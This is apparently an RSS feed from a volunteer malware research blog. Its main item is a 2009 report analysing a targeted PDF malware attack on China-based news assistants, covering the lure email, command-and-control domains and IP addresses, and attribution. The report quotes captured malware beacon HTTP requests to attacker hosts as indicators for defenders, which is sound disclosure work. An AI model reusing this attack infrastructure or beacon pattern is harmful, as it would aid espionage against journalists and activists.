<p>13 http://www.hrichina.org/public/contents/press?revision_id=147917&#038;item_id=56408</p>
<p>14 http://www.amnesty.org/en/library/asset/ASA17/040/2009/en/9ede45c2-3943-4a5b-b75b-7ef68fb6d787/asa170402009en.html</p>
<p>15 http://www.ifex.org/china/2007/07/23/hackers_block_access_to_human_rights/</p>
<p>16 The FCCC&#8217;s WordPress installation was compromised and malicious iframes were inserted which loaded hxxp://www.nontopworld.com/homepage.htm and hxxp//http://www.nontopworld.com/mainpage.htm.</p>
<p>17 http://isc.sans.org/diary.html?storyid=6733</p>
<p>18 http://blog.fireeye.com/research/2009/07/who-is-exploiting-office-web-components-0day.html</p>
<p>19 http://blogs.technet.com/srd/archive/2009/07/13/more-information-about-the-office-web-components-activex-vulnerability.aspx</p>
<p>20 http://en.wikipedia.org/wiki/Phishing</p>
<p>21 http://wepawet.iseclab.org/view.php?hash=5f227eaf1e27d92a8c23e2daebbe4b2f&#038;type=swf</p>
<p>22 http://domain.oray.cn/#tab=free</p>
<p>23 http://www.tibetoffice.ch/news/circular_oot_geneva_280308.htm</p>
<p>24 http://blog.fireeye.com/research/2009/07/who-is-exploiting-the-adobe-flash-0day-part-2.html</p>
<p>25 http://www.symantec.com/connect/blogs/justsystems-ichitaro-zero-day-used-propogate-trojan-0</p>
<p>26 The same page in the Google cache from a day earlier did not contain the malicious link.</p>
]]></content:encoded>
			<wfw:commentRss>http://malwarelab.org/2009/10/0day-civil-society-and-cyber-security/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Targeted Malware Attack on Foreign Correspondent’s based in China</title>
		<link>http://malwarelab.org/2009/09/targeted-malware-attack-on-foreign-correspondent%e2%80%99s-based-in-china/</link>
		<comments>http://malwarelab.org/2009/09/targeted-malware-attack-on-foreign-correspondent%e2%80%99s-based-in-china/#comments</comments>
		<pubDate>Mon, 28 Sep 2009 10:46:15 +0000</pubDate>
		<dc:creator>nart</dc:creator>
				<category><![CDATA[Reports]]></category>
		<category><![CDATA[China]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Media]]></category>
		<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[Taiwan]]></category>

		<guid isPermaLink="false">http://malwarelab.org/?p=38</guid>
		<description><![CDATA[By Nart Villeneuve and Greg Walton Overview There have been recent reports of malware attacks on journalists based in China. The attacks specifically targeted Chinese employees working for media organizations, including Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa.1 These employees received an email from &#8220;Pam &#8221; who claimed to be an [...]]]></description>
			<content:encoded><![CDATA[<p>By Nart Villeneuve and Greg Walton</p>
<p><strong>Overview</strong></p>
<p>There have been recent reports of malware attacks on journalists based in China. The attacks specifically targeted Chinese employees working for media organizations, including Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa.<sup>1</sup> These employees received an email from &#8220;Pam
<pam.bourdon@yahoo.com>&#8221;  who claimed to be an editor with the Straits Times, that came with a PDF attachment that contains malware. When opened, malicious code in the PDF exploits the Adobe Reader program and drops the malware on the target’s computer. </p>
<p>These attacks correlate with reports of increased security measures within China as a result of the 60th anniversary of the founding of the People&#8217;s Republic of China.<sup>2</sup> These increased security measures have also been extended to the Internet, with providers of anti-censorship technology reporting increased levels of blocking that prevents people from accessing the web sites of foreign media and news organizations.<sup>3</sup></p>
<p>This short briefing from the Malware Lab and the Information Warfare Monitor analyzes a sample from one of the attacks on behalf of an international news agency that operates in China, and a member of the Foreign Correspondents Club in Beijing.<sup>4</sup></p>
<p><strong>Key Findings:</strong></p>
<ul>
<li>The content of the email, and the accompanying malicious attachment, are in well written English and contain accurate information. The email details a reporter’s proposed trip to China to write a story on China&#8217;s place in the global economy; all the contacts in the malicious attachment are real people that are knowledgeable about or have a professional interest in China&#8217;s economy.</li>
<li>The domain names used as “command &#038; control” servers for the malware have been used in previous targeted attacks dating back to 2007. The malware domain names, as in previously documented cases, only resolve to real IP addresses for short periods of time.</li>
<li>The malware exploits vulnerabilities in the Adobe PDF Reader, and its behaviour matches that of malware used in previous attacks dating back to 2008. This malware was found on computers at the Offices of Tibet in London, and has used political themes in malware attachments in the past.</li>
<li>The IP addresses currently used by the malware are assigned to Taiwan. One of the servers is located at the National Central University of Taiwan, and is a server to which students and faculty connect to download anti-virus software. The second is an IP address assigned to the Taiwan Academic Network. These compromised servers present a severe security problem as the attackers may have substituted their malware for anti-virus software used by students, employees, and faculty at the National Central University.</li>
</ul>
<div id="attachment_23" class="wp-caption aligncenter" style="width: 298px"><a href="http://malwarelab.org/wp-content/uploads/2009/09/b.doc.png"><img src="http://malwarelab.org/wp-content/uploads/2009/09/b.doc-288x300.png" alt="The Pam Bourdon Email" title="pbemail.png" width="288" height="300" class="size-medium wp-image-23" /></a><p class="wp-caption-text">The Pam Bourdon Email</p></div>
<p><strong>Analysis</strong></p>
<p>The email sent to the foreign correspondents from &#8220;Pam
<pam.bourdon@yahoo.com>&#8221; appears to be customized and targeted. The context of the letter and the attached PDF, “Interview list.pdf” is specific to journalists. The email itself is focused on setting up meetings for journalists in China, and the attached PDF contains a list of genuine contacts in China that relate to the context of the email. The name of the hotel and its address are accurate. Moreover, the purpose for the trip to China, to research the “annual economic survey,” correlates with the World Economic Forum&#8217;s release of its “Global Competitiveness Report” on September 8, 2009 and the conference that followed in Dalian, China on September 10-12, 2009.<sup>5</sup></p>
<p>The PDF contains malicious code that exploits Adobe Acrobat and drops malware on the target’s computer. Only 3 of 41 anti-virus products used by Virus Total detected the malicious code embedded in the PDF.<sup>6</sup></p>
<div id="attachment_24" class="wp-caption aligncenter" style="width: 310px"><a href="http://malwarelab.org/wp-content/uploads/2009/09/b.doc.-2png.png"><img src="http://malwarelab.org/wp-content/uploads/2009/09/b.doc.-2png-300x213.png" alt="The Pam Bourdon Attachment" title="pbattachment.png" width="300" height="213" class="size-medium wp-image-24" /></a><p class="wp-caption-text">The Pam Bourdon Attachment</p></div>
<p>When opened, the PDF displays a list of contacts. The contacts listed in the PDF appear to be genuine. All the names and titles in the document are accurate. However, some appear to be former positions held by the individuals, indicating that the document is somewhat dated. It is possible that this document is a legitimate document stolen from a compromised machine, modified to include malware,  and used as a lure to entice people to open the malicious attachment. </p>
<p>After opening the attachment, malware is silently dropped on the target&#8217;s computer. </p>
<p>The malware attempts DNS resolution for three domains: mail.amberice.com, menberservice.3322.org, and zwy2007.pc-officer.com. Often the domain names will not resolve to proper IP addresses; other times they will resolve only for a short period of time. In this case, two of the domain names eventually resolved:</p>
<blockquote><p>
menberservice.3322.org | 140.115.182.230<br />
zwy2007.pc-officer.com | 210.240.85.250
</p></blockquote>
<p>The domain name zwy2007.pc-officer.com resolves to 210.240.85.250 which is an IP address assigned to the Taiwan Academic Network, Ministry of Education Computer Center. The malware was unable to make successful connections to this IP address.</p>
<p>However, the domain name “pc-officer.com” is a well known malware domain name that has been used in previous attacks. In 2007, Maarten Van Horenbeeck investigated cases of targeted attacks that used a “petition to the International Olympic Committee on Chinese human rights violations” as the theme.<sup>7</sup> In those cases, the malware attempted to connect to:</p>
<blockquote><p>
ihe1979.3322.org<br />
ding.pc-officer.com | 61.219.152.125
</p></blockquote>
<p>The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.</p>
<p>A similar case was investigated by F-Secure earlier this year.<sup>8</sup> In that case, the domain names that the malware attempted to connect to were:</p>
<blockquote><p>
ihe1979.3322.org<br />
feng.pc-officer.com | 216.255.196.154<br />
feng.pc-officer.com | 211.234.122.84
</p></blockquote>
<p>The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.</p>
<p>The domain menberservice.3322.org eventually resolved to 140.115.182.230, which reverse resolves to avirus.is.ncu.edu.tw. This location (https://avirus.is.ncu.edu.tw:4343/officescan/console/html/ClientInstall/) is at the National Central University of Taiwan, and it is used by students and faculty to download anti-virus software.<sup>9</sup>  This is potentially a severe security problem, as the attackers may have substituted their malware for anti-virus software for use by students, employees, and faculty at the  National Central University.</p>
<blockquote><p>
menberservice.3322.org | 140.115.182.230 | avirus.is.ncu.edu.tw
</p></blockquote>
<p>The malware connects to this location and begins sending and receiving information:</p>
<blockquote><p>
POST http://menberservice.3322.org:8000/LFDXFiRcVs3902.rar HTTP/1.1<br />
User-Agent: Mozilla/4.2.20 (compatible; MSIE 5.0.2; Win32)<br />
Host: menberservice.3322.org<br />
Content-Length: 682<br />
Proxy-Connection: keep-alive<br />
Pragma: no-cache<br />
.new_host_42</p>
<p>HTTP/1.1 200 OK<br />
Date: Tue Sep 22 21:41:10 2009<br />
Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux)<br />
Content-Length: 32<br />
Content-Type: application/octet-stream<br />
Proxy-Connection: keep-alive
</p></blockquote>
<p>The malware matches behaviour documented by ThreatExpert earlier this year.<sup>10</sup> Documents with names such as &#8220;Urgent Appeal to Secretary Hillary Clinton.doc&#8221; and &#8220;Days with ITSN Tibet in My Eyes.doc&#8221; contained malware that connected to mmwbzhij.meibu.com on ports 8585 and 8686.</p>
<blockquote><p>
http://mmwbzhij.meibu.com:8686/[random characters].[random file extension]</p>
<p>where [random characters] string may look similar to:</p>
<p>    * qRXycRXuwJ11749<br />
    * PqJNBkcPDm18630<br />
    * ZPDPyZkZcV23661</p>
<p>and [random file extension] can be any of the following: rm, mov, mp3, pdf.
</p></blockquote>
<p>This matches behaviour that the Information Warfare Monitor documented in the “Tracking GhostNet” report<sup>11</sup> after analyzing a compromised computer at the Offices of Tibet in London, U.K. In that case, there were connections to oyd.3322.org which resolved to 58.141.132.66 on port 4501:</p>
<blockquote><p>
POST http://oyd.3322.org:4501/TkBXPPXkRL14509.pdf HTTP/1.1<br />
User-Agent: Mozilla/4.8.20 (compawhichplatform.htmtible; MSIE 5.0.2; Win32)<br />
Host: oyd.3322.org<br />
Content-Length: 46<br />
Proxy-Connection: keep-alive<br />
Pragma: no-cache<br />
new_host_24</p>
<p>HTTP/1.1 200 OK<br />
Date: Wed Oct 01 23:05:15 2008<br />
Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux)<br />
Content-Length: 44<br />
Content-Type: application/octet-stream<br />
Proxy-Connection: keep-alive
</p></blockquote>
<p>A follow-up visit to  OOT-London found another malware infection connecting to mmwbzhij.meibu.com which resolved to 216.131.67.95 on port  8686:</p>
<blockquote><p>
POST http://mmwbzhij.meibu.com:8686/yDFDcVoFma29957.mp3 HTTP/1.1<br />
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)<br />
Host: mmwbzhij.meibu.com<br />
Content-Length: 32<br />
Proxy-Connection: keep-alive<br />
Pragma: no-cache<br />
.new_host_23</p>
<p>HTTP/1.1 200 OK<br />
Date: Fri Apr 10 22:49:22 2009<br />
Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux)<br />
Content-Length: 32<br />
Content-Type: application/octet-stream<br />
Proxy-Connection: keep-alive
</p></blockquote>
<p>The domain names 3322.org and meibu.com are dynamic DNS services that allow the attackers to map domain names to IP addresses they control. In these cases, the attackers are not required to register domain names. Attackers typically favour dynamic DNS services such as these.<sup>12</sup> The attackers have pointed these domains to IP&#8217;s on the networks of Black Oak Computers Inc, CA, USA, and C&#038;M Communication Co., Ltd., Korea, in addition to the Taiwan Academic Network.</p>
<p>The control servers on pc-officer.com have, in the past, resolved to IP addresses on One Eighty Networks, WA, USA, KIDC, Korea and HINET, Taiwan, in addition to the National Central University of Taiwan&#8217;s server where students and faculty download anti-virus software.</p>
<p><strong>Attribution Issues</strong></p>
<p>In general, determining attribution in these types of attacks is difficult.  Analyzing domain registration and other contextual information can occasionally provide some useful leads.</p>
<p>The domain names pc-officer.com and amberice.com were registered in 2007 to “wei zheng” using the email address “sunny@hetu.cn” and the phone number “86-010-4564654.” There are some links between these data and the registration data in other domain names. For example, “wei zheng” also registered “fclinux.com” with the email address “asdfi@hotmail.com” and the phone number “86 10 13810358162.” This “wei zheng” also registered “winxpupdata.com” with the phone number “86 10 13810358162” with the email address “afsaf@hotmail.com.” A variety of domain names, such as ag365.com, are registered to “Hetu Time Networking Technology Ltd.” in the name of  “lin long” with the email address “harry@hetu.cn.” However the technical contact is “lin hai” with the email address “sunny@hetu.cn.”</p>
<p>It is unclear what the connection is here as “hetu.cn” is a domain registrar and hosting company. It is possible that the information is not connected to the attackers, but others who have been compromised by the attackers. </p>
<p>There is another avenue of inquiry that impacts attribution. It is not clear how the email addresses of the recipients, who are local employees for foreign journalists, were acquired by the attackers.<sup>13</sup>  The Reuters news story about the targeted email attacks makes an important point about those who were targeted:</p>
<blockquote><p>
The &#8220;Pam Bourdon&#8221; emails on Monday targeted Chinese news assistants, whose names often do not appear on news reports and who must be hired through an agency that reports to the Foreign Ministry.<sup>14</sup>
</p></blockquote>
<p>Considering that the contact information of these assistants was not publicly known, but was known to China&#8217;s Foreign Ministry, an element of suspicion is raised concerning the involvement of the latter. However, there are alternative explanations for how the attackers were able to assemble the list of contacts. These attackers have been actively compromising targets since at least 2007, and likely compile lists of new targets from information acquired through previous exploits. In fact, the accuracy of the email used in this case, and the malicious attachment, suggest that the attackers leveraged information stolen from previously compromised computers. </p>
<p>There is no evidence that directly implicates the government of China in these attacks. </p>
<p>However, both the timing and targets of the attack do raise questions. With the 60th anniversary of the People&#8217;s Republic if China fast approaching, it is difficult to dismiss attacks on high profile media targets such as Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa as random events. These organizations were targeted directly, but the motivation of the attackers remains unknown. Furthermore, the use of compromised servers at the National Central University of Taiwan and the Taiwan Academic Network will no doubt add to an already tense relationship between China and Taiwan.</p>
<p><strong>About IWM</strong></p>
<p>The Information Warfare Monitor (www.infowar-monitor.net) is an advanced research activity tracking the emergence of cyberspace as a strategic domain. The IWM is public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto and The SecDev Group, an operational think tank based in Ottawa (Canada).</p>
<p><strong>About Malware Lab</strong></p>
<p>The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The ML combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks. </p>
<p><strong>Notes</strong></p>
<p>[1] See, http://www.fccchina.org/2009/09/21/warning-on-fake-emails-targeting-news-assistants/ and http://www.reuters.com/article/internetNews/idUSTRE58L0LJ20090922</p>
<p>[2] http://edition.cnn.com/2009/WORLD/asiapcf/09/21/china.national.day/</p>
<p>[3] http://www.pcworld.com/article/172627/china_clamps_down_on_internet_ahead_of_60th_anniversary.html , http://ifex.org/china/2009/09/23/censorship_and_cyber_attacks/</p>
<p>[4] This follows an investigation of the FCCC&#8217;s web server conducted last month. The FCCC&#8217;s WordPress installation was compromised and malicious “iframes” were inserted which loaded www.nontopworld.com/homepage.htm and www.nontopworld.com/mainpage.htm. The IP address for nontopworld.com (58.64.130.11) appears on a list of IP addresses linked to the Russian Business Network (RBN). http://doc.emergingthreats.net/pub/Main/RussianBusinessNetwork/RussianBusinessNetworkIPs.txt</p>
<p>[5] http://www.weforum.org/en/events/ArchivedEvents/AnnualMeetingoftheNewChampions2009/index.htm</p>
<p>[6] http://www.virustotal.com/analisis/dbcdddc779877d4ca2e30b6d21d407f661379155775ae39ec545984095ed07dd-1253586587</p>
<p>[7] http://isc.sans.org/diary.html?storyid=3400, http://www.daemon.be/maarten/Crouching_Powerpoint_Hidden_Trojan_24C3.pdf, http://www.daemon.be/maarten/targetedattacks.html, http://www.virustotal.com/analisis/755530853391444e729220443ce869e908f060c345b2c2aaac8b3cb5e6bffe7a-1190194670, http://www.virustotal.com/analisis/f5eaf65eefad528e6e46cb9c51ae3fb07b9f9b851a338235d787c963a47f80d6-1223527899, http://www.virustotal.com/analisis/d77f3145624c2ae20581265773d509d7ee9ad7e65ba187b891f777feb794ebfb-1190849733</p>
<p>[8] http://www.f-secure.com/weblog/archives/00001649.html and http://www.virustotal.com/analisis/cc15b6402c507364a41c32f8b4176670bc609259543523d42a865c2823b6dd2e-1238734246</p>
<p>[9] http://www.cc.ncu.edu.tw/Eng_faq/anti-virus.php</p>
<p>[10] http://blog.threatexpert.com/2009/02/politically-motivated-trojan.html, http://www.threatexpert.com/report.aspx?md5=02f2029647e85fff81620b2c333bc9cf and http://www.threatexpert.com/report.aspx?md5=7ce96a0ed4d71c26d2c377dd331e4466</p>
<p>[11] http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network</p>
<p>[12] http://www.businessweek.com/magazine/content/08_16/b4080032218430_page_4.htm</p>
<p>[13] http://www.themalaysianinsider.com/index.php/world/38375-e-mail-viruses-target-foreign-media-in-china</p>
<p>[14] http://www.nytimes.com/reuters/2009/09/22/world/international-us-china-cyberattack.html?_r=1</p>
]]></content:encoded>
			<wfw:commentRss>http://malwarelab.org/2009/09/targeted-malware-attack-on-foreign-correspondent%e2%80%99s-based-in-china/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hello world!</title>
		<link>http://malwarelab.org/2009/09/hello-world/</link>
		<comments>http://malwarelab.org/2009/09/hello-world/#comments</comments>
		<pubDate>Fri, 25 Sep 2009 15:43:23 +0000</pubDate>
		<dc:creator>nart</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Lab]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://malwarelab.org/?p=1</guid>
		<description><![CDATA[The Malware Lab is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader [...]]]></description>
			<content:encoded><![CDATA[<p>The Malware Lab is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.</p>
<p>Our mission is to accurately document and analyze politically motivated, malware attacks in order to raise public awareness, inform policy makers and contribute to the improvement of information security.</p>
<p>The Malware Lab aims to contribute to the improvement of information security by:</p>
<p>    * To provide civil society, policy makers and the public with an accurate analysis of politically motivated, malware attacks through the fusion of technical data and socio-political context.<br />
    * To enable a community of researchers from diverse backgrounds to contribute to a repository of malware data, develop methods and tools for malware investigations and collaborate on collection, analysis and reporting.</p>
<p>The Malware Lab maintains a blog in which members of the collective publish research findings and share information on research tools and techniques. While many of the blog posts will cover emerging threats and recent attacks members are encouraged to collaborate on in-depth reports and investigations of specific cases. </p>
]]></content:encoded>
			<wfw:commentRss>http://malwarelab.org/2009/09/hello-world/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
